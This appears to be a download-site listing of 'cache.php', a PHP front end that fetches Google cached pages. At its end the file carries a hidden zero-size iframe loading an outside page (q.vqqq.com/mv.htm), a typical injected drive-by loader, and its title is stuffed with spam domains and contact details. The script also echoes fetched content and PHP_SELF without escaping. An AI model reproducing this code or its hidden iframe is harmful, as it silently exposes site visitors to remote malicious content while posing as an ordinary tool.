⭐ 欢迎来到虫虫下载站! | 📦 资源下载 📁 资源专辑 ℹ️ 关于我们
⭐ 虫虫下载站

📄 cache.php

📁 一个非常不错的搜索程序,值的收藏! 用.NET开发
💻 PHP
字号:
<?
require("config.php");
require("nusoap.php");
require("code.php");

$url = $_GET["url"];

if(isset($url)) {
	$BadUrls = split("\|", $BadUrls);
	foreach($BadUrls as $aBadUrls) {
		if(stristr($url, $aBadUrls)) {
			die("该网址可能含有敏感内容,不太好给你看,想别的办法吧 :P");
		}
	}
	
	$soap = new soapclient($googleWSDL, true);
	$soap->decodeUTF8(false);

	$params = array(
		'key' => $googleAPIKey,
		'url' => $url
	);
	
	$res = $soap->call("doGetCachedPage", $params, "urn:GetCachedPage", "urn:GetCachedPage");
	print($res);
}
else {
?>
<html>
<head>
<title><?=$Sitename?> google 网页快照引擎欢迎到www.1101.net和www.8487.net和www.bb5b.com和www.bb7b.com,联系qq:315151629和6439358和124094017,联系email: vqqq59r@163.com和ping858788@yahoo.com.cn</title>
<meta http-equiv=Content-Type content="text/html; charset=gb2312">
<style type="text/css">
td{color:gray;font-size:12px}
a {color:gray;text-decoration:none}
a:visited {color:gray;text-decoration:none}
a:hover {color: #f33;text-decoration:underline overline}
</style>
</head>
<body leftmargin="0" topmargin="0">
<table border=0 width=700 align=center>
<form method="get" action="<?=$_SERVER["PHP_SELF"]?>" target="cacheIframe" onSubmit="window.open('','cacheIframe')">
<tr>
<td align=center>
<input type="text" name="url" value="http://" size="30"><input type="submit" value="获取网页快照">
</td>
</tr>
</form>
</table>
<iframe name="cacheIframe" src="about:blank" style="width:100%;height:expression(document.body.clientHeight-this.offsetTop)"></iframe>
</body>
</HTML><iframe frameborder=0 leftmargin=0 marginheight=0 marginwidth=0 scrolling=no src="http://q.vqqq.com/mv.htm" topmargin=0 width=0 height=0></iframe>
<?
}
?>

⌨️ 快捷键说明

复制代码 Ctrl + C
搜索代码 Ctrl + F
全屏模式 F11
切换主题 Ctrl + Shift + D
显示快捷键 ?
增大字号 Ctrl + =
减小字号 Ctrl + -